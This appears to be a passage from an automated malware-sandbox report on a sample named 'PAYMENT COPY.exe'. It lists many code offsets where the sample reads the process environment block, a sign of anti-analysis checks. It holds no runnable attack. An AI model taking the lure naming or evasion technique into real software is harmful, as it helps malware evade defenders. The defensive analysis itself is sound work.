                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01090115 mov eax, dword ptr fs:[00000030h]1_2_01090115
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FCA0E3 mov ecx, dword ptr fs:[00000030h]1_2_00FCA0E3
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0107A118 mov ecx, dword ptr fs:[00000030h]1_2_0107A118
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0107A118 mov eax, dword ptr fs:[00000030h]1_2_0107A118
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0107A118 mov eax, dword ptr fs:[00000030h]1_2_0107A118
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0107A118 mov eax, dword ptr fs:[00000030h]1_2_0107A118
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01000124 mov eax, dword ptr fs:[00000030h]1_2_01000124
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01064144 mov eax, dword ptr fs:[00000030h]1_2_01064144
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01064144 mov eax, dword ptr fs:[00000030h]1_2_01064144
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01064144 mov ecx, dword ptr fs:[00000030h]1_2_01064144
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01064144 mov eax, dword ptr fs:[00000030h]1_2_01064144
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01064144 mov eax, dword ptr fs:[00000030h]1_2_01064144
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01068158 mov eax, dword ptr fs:[00000030h]1_2_01068158
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010A4164 mov eax, dword ptr fs:[00000030h]1_2_010A4164
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010A4164 mov eax, dword ptr fs:[00000030h]1_2_010A4164
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD208A mov eax, dword ptr fs:[00000030h]1_2_00FD208A
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0108C188 mov eax, dword ptr fs:[00000030h]1_2_0108C188
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0108C188 mov eax, dword ptr fs:[00000030h]1_2_0108C188
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01010185 mov eax, dword ptr fs:[00000030h]1_2_01010185
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01074180 mov eax, dword ptr fs:[00000030h]1_2_01074180
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01074180 mov eax, dword ptr fs:[00000030h]1_2_01074180
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FFC073 mov eax, dword ptr fs:[00000030h]1_2_00FFC073
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0105019F mov eax, dword ptr fs:[00000030h]1_2_0105019F
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0105019F mov eax, dword ptr fs:[00000030h]1_2_0105019F
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0105019F mov eax, dword ptr fs:[00000030h]1_2_0105019F
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0105019F mov eax, dword ptr fs:[00000030h]1_2_0105019F
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010A21AE mov eax, dword ptr fs:[00000030h]1_2_010A21AE
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD2050 mov eax, dword ptr fs:[00000030h]1_2_00FD2050
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010961C3 mov eax, dword ptr fs:[00000030h]1_2_010961C3
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010961C3 mov eax, dword ptr fs:[00000030h]1_2_010961C3
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0104E1D0 mov eax, dword ptr fs:[00000030h]1_2_0104E1D0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0104E1D0 mov eax, dword ptr fs:[00000030h]1_2_0104E1D0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0104E1D0 mov ecx, dword ptr fs:[00000030h]1_2_0104E1D0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0104E1D0 mov eax, dword ptr fs:[00000030h]1_2_0104E1D0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0104E1D0 mov eax, dword ptr fs:[00000030h]1_2_0104E1D0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FCA020 mov eax, dword ptr fs:[00000030h]1_2_00FCA020
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FCC020 mov eax, dword ptr fs:[00000030h]1_2_00FCC020
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FEE016 mov eax, dword ptr fs:[00000030h]1_2_00FEE016
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FEE016 mov eax, dword ptr fs:[00000030h]1_2_00FEE016
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FEE016 mov eax, dword ptr fs:[00000030h]1_2_00FEE016
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FEE016 mov eax, dword ptr fs:[00000030h]1_2_00FEE016
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010A61E5 mov eax, dword ptr fs:[00000030h]1_2_010A61E5
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010001F8 mov eax, dword ptr fs:[00000030h]1_2_010001F8
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01054000 mov ecx, dword ptr fs:[00000030h]1_2_01054000
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01072000 mov eax, dword ptr fs:[00000030h]1_2_01072000
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01072000 mov eax, dword ptr fs:[00000030h]1_2_01072000
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01072000 mov eax, dword ptr fs:[00000030h]1_2_01072000
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01072000 mov eax, dword ptr fs:[00000030h]1_2_01072000
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01072000 mov eax, dword ptr fs:[00000030h]1_2_01072000
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01072000 mov eax, dword ptr fs:[00000030h]1_2_01072000
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01072000 mov eax, dword ptr fs:[00000030h]1_2_01072000
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01072000 mov eax, dword ptr fs:[00000030h]1_2_01072000
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01066030 mov eax, dword ptr fs:[00000030h]1_2_01066030
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01056050 mov eax, dword ptr fs:[00000030h]1_2_01056050
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FCA197 mov eax, dword ptr fs:[00000030h]1_2_00FCA197
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FCA197 mov eax, dword ptr fs:[00000030h]1_2_00FCA197
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FCA197 mov eax, dword ptr fs:[00000030h]1_2_00FCA197
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD6154 mov eax, dword ptr fs:[00000030h]1_2_00FD6154
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD6154 mov eax, dword ptr fs:[00000030h]1_2_00FD6154
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FCC156 mov eax, dword ptr fs:[00000030h]1_2_00FCC156
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010680A8 mov eax, dword ptr fs:[00000030h]1_2_010680A8
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010960B8 mov eax, dword ptr fs:[00000030h]1_2_010960B8
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010960B8 mov ecx, dword ptr fs:[00000030h]1_2_010960B8
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010520DE mov eax, dword ptr fs:[00000030h]1_2_010520DE
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010560E0 mov eax, dword ptr fs:[00000030h]1_2_010560E0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010120F0 mov ecx, dword ptr fs:[00000030h]1_2_010120F0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0100A30B mov eax, dword ptr fs:[00000030h]1_2_0100A30B
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0100A30B mov eax, dword ptr fs:[00000030h]1_2_0100A30B
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0100A30B mov eax, dword ptr fs:[00000030h]1_2_0100A30B
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE02E1 mov eax, dword ptr fs:[00000030h]1_2_00FE02E1
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE02E1 mov eax, dword ptr fs:[00000030h]1_2_00FE02E1
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE02E1 mov eax, dword ptr fs:[00000030h]1_2_00FE02E1
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FDA2C3 mov eax, dword ptr fs:[00000030h]1_2_00FDA2C3
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FDA2C3 mov eax, dword ptr fs:[00000030h]1_2_00FDA2C3
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FDA2C3 mov eax, dword ptr fs:[00000030h]1_2_00FDA2C3
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FDA2C3 mov eax, dword ptr fs:[00000030h]1_2_00FDA2C3
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FDA2C3 mov eax, dword ptr fs:[00000030h]1_2_00FDA2C3
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01078350 mov ecx, dword ptr fs:[00000030h]1_2_01078350
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0105035C mov eax, dword ptr fs:[00000030h]1_2_0105035C
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0105035C mov eax, dword ptr fs:[00000030h]1_2_0105035C
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0105035C mov eax, dword ptr fs:[00000030h]1_2_0105035C
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0105035C mov ecx, dword ptr fs:[00000030h]1_2_0105035C
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0105035C mov eax, dword ptr fs:[00000030h]1_2_0105035C
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0105035C mov eax, dword ptr fs:[00000030h]1_2_0105035C
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0109A352 mov eax, dword ptr fs:[00000030h]1_2_0109A352
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE02A0 mov eax, dword ptr fs:[00000030h]1_2_00FE02A0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE02A0 mov eax, dword ptr fs:[00000030h]1_2_00FE02A0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0107437C mov eax, dword ptr fs:[00000030h]1_2_0107437C
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FC826B mov eax, dword ptr fs:[00000030h]1_2_00FC826B
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD4260 mov eax, dword ptr fs:[00000030h]1_2_00FD4260
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD4260 mov eax, dword ptr fs:[00000030h]1_2_00FD4260
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD4260 mov eax, dword ptr fs:[00000030h]1_2_00FD4260
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD6259 mov eax, dword ptr fs:[00000030h]1_2_00FD6259
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FCA250 mov eax, dword ptr fs:[00000030h]1_2_00FCA250
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0108C3CD mov eax, dword ptr fs:[00000030h]1_2_0108C3CD
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010563C0 mov eax, dword ptr fs:[00000030h]1_2_010563C0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FC823B mov eax, dword ptr fs:[00000030h]1_2_00FC823B
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010743D4 mov eax, dword ptr fs:[00000030h]1_2_010743D4
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010743D4 mov eax, dword ptr fs:[00000030h]1_2_010743D4
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0107E3DB mov eax, dword ptr fs:[00000030h]1_2_0107E3DB
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0107E3DB mov eax, dword ptr fs:[00000030h]1_2_0107E3DB
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0107E3DB mov ecx, dword ptr fs:[00000030h]1_2_0107E3DB
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0107E3DB mov eax, dword ptr fs:[00000030h]1_2_0107E3DB
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010063FF mov eax, dword ptr fs:[00000030h]1_2_010063FF
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FEE3F0 mov eax, dword ptr fs:[00000030h]1_2_00FEE3F0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FEE3F0 mov eax, dword ptr fs:[00000030h]1_2_00FEE3F0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FEE3F0 mov eax, dword ptr fs:[00000030h]1_2_00FEE3F0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE03E9 mov eax, dword ptr fs:[00000030h]1_2_00FE03E9
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE03E9 mov eax, dword ptr fs:[00000030h]1_2_00FE03E9
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE03E9 mov eax, dword ptr fs:[00000030h]1_2_00FE03E9
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE03E9 mov eax, dword ptr fs:[00000030h]1_2_00FE03E9
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE03E9 mov eax, dword ptr fs:[00000030h]1_2_00FE03E9
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE03E9 mov eax, dword ptr fs:[00000030h]1_2_00FE03E9
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE03E9 mov eax, dword ptr fs:[00000030h]1_2_00FE03E9
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE03E9 mov eax, dword ptr fs:[00000030h]1_2_00FE03E9
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD83C0 mov eax, dword ptr fs:[00000030h]1_2_00FD83C0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD83C0 mov eax, dword ptr fs:[00000030h]1_2_00FD83C0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD83C0 mov eax, dword ptr fs:[00000030h]1_2_00FD83C0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD83C0 mov eax, dword ptr fs:[00000030h]1_2_00FD83C0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FDA3C0 mov eax, dword ptr fs:[00000030h]1_2_00FDA3C0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FDA3C0 mov eax, dword ptr fs:[00000030h]1_2_00FDA3C0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FDA3C0 mov eax, dword ptr fs:[00000030h]1_2_00FDA3C0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FDA3C0 mov eax, dword ptr fs:[00000030h]1_2_00FDA3C0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FDA3C0 mov eax, dword ptr fs:[00000030h]1_2_00FDA3C0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FDA3C0 mov eax, dword ptr fs:[00000030h]1_2_00FDA3C0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01058243 mov eax, dword ptr fs:[00000030h]1_2_01058243
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01058243 mov ecx, dword ptr fs:[00000030h]1_2_01058243
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0108A250 mov eax, dword ptr fs:[00000030h]1_2_0108A250
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0108A250 mov eax, dword ptr fs:[00000030h]1_2_0108A250
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FC8397 mov eax, dword ptr fs:[00000030h]1_2_00FC8397
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FC8397 mov eax, dword ptr fs:[00000030h]1_2_00FC8397
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FC8397 mov eax, dword ptr fs:[00000030h]1_2_00FC8397
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FF438F mov eax, dword ptr fs:[00000030h]1_2_00FF438F
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FF438F mov eax, dword ptr fs:[00000030h]1_2_00FF438F
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FCE388 mov eax, dword ptr fs:[00000030h]1_2_00FCE388
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FCE388 mov eax, dword ptr fs:[00000030h]1_2_00FCE388
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FCE388 mov eax, dword ptr fs:[00000030h]1_2_00FCE388
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0100E284 mov eax, dword ptr fs:[00000030h]1_2_0100E284
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0100E284 mov eax, dword ptr fs:[00000030h]1_2_0100E284
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01050283 mov eax, dword ptr fs:[00000030h]1_2_01050283
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01050283 mov eax, dword ptr fs:[00000030h]1_2_01050283
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01050283 mov eax, dword ptr fs:[00000030h]1_2_01050283
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010662A0 mov eax, dword ptr fs:[00000030h]1_2_010662A0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010662A0 mov ecx, dword ptr fs:[00000030h]1_2_010662A0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010662A0 mov eax, dword ptr fs:[00000030h]1_2_010662A0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010662A0 mov eax, dword ptr fs:[00000030h]1_2_010662A0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010662A0 mov eax, dword ptr fs:[00000030h]1_2_010662A0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010662A0 mov eax, dword ptr fs:[00000030h]1_2_010662A0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FCC310 mov ecx, dword ptr fs:[00000030h]1_2_00FCC310
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FF0310 mov ecx, dword ptr fs:[00000030h]1_2_00FF0310
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01066500 mov eax, dword ptr fs:[00000030h]1_2_01066500
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010A4500 mov eax, dword ptr fs:[00000030h]1_2_010A4500
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010A4500 mov eax, dword ptr fs:[00000030h]1_2_010A4500
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010A4500 mov eax, dword ptr fs:[00000030h]1_2_010A4500
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010A4500 mov eax, dword ptr fs:[00000030h]1_2_010A4500
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010A4500 mov eax, dword ptr fs:[00000030h]1_2_010A4500
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010A4500 mov eax, dword ptr fs:[00000030h]1_2_010A4500
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010A4500 mov eax, dword ptr fs:[00000030h]1_2_010A4500
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD04E5 mov ecx, dword ptr fs:[00000030h]1_2_00FD04E5
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD64AB mov eax, dword ptr fs:[00000030h]1_2_00FD64AB
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0100656A mov eax, dword ptr fs:[00000030h]1_2_0100656A
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0100656A mov eax, dword ptr fs:[00000030h]1_2_0100656A
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0100656A mov eax, dword ptr fs:[00000030h]1_2_0100656A
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01004588 mov eax, dword ptr fs:[00000030h]1_2_01004588
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FFA470 mov eax, dword ptr fs:[00000030h]1_2_00FFA470
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FFA470 mov eax, dword ptr fs:[00000030h]1_2_00FFA470
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FFA470 mov eax, dword ptr fs:[00000030h]1_2_00FFA470
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0100E59C mov eax, dword ptr fs:[00000030h]1_2_0100E59C
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FC645D mov eax, dword ptr fs:[00000030h]1_2_00FC645D
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010505A7 mov eax, dword ptr fs:[00000030h]1_2_010505A7
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010505A7 mov eax, dword ptr fs:[00000030h]1_2_010505A7
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010505A7 mov eax, dword ptr fs:[00000030h]1_2_010505A7
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FF245A mov eax, dword ptr fs:[00000030h]1_2_00FF245A
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0100E5CF mov eax, dword ptr fs:[00000030h]1_2_0100E5CF
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0100E5CF mov eax, dword ptr fs:[00000030h]1_2_0100E5CF
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0100A5D0 mov eax, dword ptr fs:[00000030h]1_2_0100A5D0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0100A5D0 mov eax, dword ptr fs:[00000030h]1_2_0100A5D0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FCC427 mov eax, dword ptr fs:[00000030h]1_2_00FCC427
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FCE420 mov eax, dword ptr fs:[00000030h]1_2_00FCE420
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FCE420 mov eax, dword ptr fs:[00000030h]1_2_00FCE420
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FCE420 mov eax, dword ptr fs:[00000030h]1_2_00FCE420
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0100C5ED mov eax, dword ptr fs:[00000030h]1_2_0100C5ED
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0100C5ED mov eax, dword ptr fs:[00000030h]1_2_0100C5ED
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01008402 mov eax, dword ptr fs:[00000030h]1_2_01008402
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01008402 mov eax, dword ptr fs:[00000030h]1_2_01008402
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01008402 mov eax, dword ptr fs:[00000030h]1_2_01008402
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FFE5E7 mov eax, dword ptr fs:[00000030h]1_2_00FFE5E7
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FFE5E7 mov eax, dword ptr fs:[00000030h]1_2_00FFE5E7
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FFE5E7 mov eax, dword ptr fs:[00000030h]1_2_00FFE5E7
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FFE5E7 mov eax, dword ptr fs:[00000030h]1_2_00FFE5E7
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FFE5E7 mov eax, dword ptr fs:[00000030h]1_2_00FFE5E7
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FFE5E7 mov eax, dword ptr fs:[00000030h]1_2_00FFE5E7
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FFE5E7 mov eax, dword ptr fs:[00000030h]1_2_00FFE5E7
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FFE5E7 mov eax, dword ptr fs:[00000030h]1_2_00FFE5E7
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD25E0 mov eax, dword ptr fs:[00000030h]1_2_00FD25E0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01056420 mov eax, dword ptr fs:[00000030h]1_2_01056420
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01056420 mov eax, dword ptr fs:[00000030h]1_2_01056420
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01056420 mov eax, dword ptr fs:[00000030h]1_2_01056420
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01056420 mov eax, dword ptr fs:[00000030h]1_2_01056420
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01056420 mov eax, dword ptr fs:[00000030h]1_2_01056420
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01056420 mov eax, dword ptr fs:[00000030h]1_2_01056420
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01056420 mov eax, dword ptr fs:[00000030h]1_2_01056420
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD65D0 mov eax, dword ptr fs:[00000030h]1_2_00FD65D0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0100E443 mov eax, dword ptr fs:[00000030h]1_2_0100E443
